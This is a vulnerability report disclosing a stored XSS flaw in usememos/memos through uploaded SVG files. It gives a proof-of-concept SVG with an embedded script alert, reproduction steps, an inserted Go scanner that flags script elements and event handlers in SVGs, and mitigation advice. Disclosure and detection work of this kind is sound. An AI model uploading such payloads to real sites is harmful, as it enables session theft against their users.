Stored XSS via SVG File in usememos/memos
Valid
Reported on Dec 20th 2022
Description
usememos has a feature to upload a file and display it. By uploading a crafted SVG file, a user can perform a stored XSS attack via the image's direct link.
Copy the following code and save as filename.svg.
Proof of Concept (filename.svg)
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
- Log in as a user
- Create a new post and upload the SVG file
- Save the post
- Take the direct link of the image and open it in a new tab
- See the XSS (example link: https://<yoursite>/o/r/8/filename.svg).
If you need more specific information, feel free to contact me.
Impact
If an attacker can execute script in the victim's browser via an SVG file, they might compromise that user by stealing their cookies and performing other malicious actions.
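An upload-time check for the kind of file in this report, as an added example (not code from the report or from usememos/memos): it parses an SVG with Go's `encoding/xml` and reports script elements, event-handler attributes and `javascript:` links. The function name `svgActiveContent` and the embedded sample are constructed for illustration.

```go
package main

import (
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// Constructed sample: the report's proof of concept, shortened.
const sampleSVG = `<?xml version="1.0" standalone="no"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/>
<script type="text/javascript">alert(document.location);</script>
</svg>`

// svgActiveContent lists script-capable constructs in an SVG; a parse error means reject.
func svgActiveContent(data []byte) ([]string, error) {
	var findings []string
	dec := xml.NewDecoder(bytes.NewReader(data))
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return findings, nil
		} else if err != nil {
			return findings, err
		}
		el, ok := tok.(xml.StartElement)
		if !ok {
			continue // only element start tags carry the constructs checked here
		}
		if strings.EqualFold(el.Name.Local, "script") {
			findings = append(findings, "element <script>")
		}
		for _, a := range el.Attr {
			attr := strings.ToLower(a.Name.Local)
			if strings.HasPrefix(attr, "on") {
				findings = append(findings, "event handler "+attr)
			}
			if attr == "href" && strings.HasPrefix(strings.ToLower(strings.TrimSpace(a.Value)), "javascript:") {
				findings = append(findings, "javascript: URL in href")
			}
		}
	}
}

func main() {
	fmt.Println(svgActiveContent([]byte(sampleSVG)))
}
```

A scan like this only rejects the constructs it knows about. Serving uploaded files with `Content-Disposition: attachment` or a restrictive `Content-Security-Policy` header covers files it misses.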
We are processing your report and will contact the usememos/memos team within 24 hours.
20 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back
19 days ago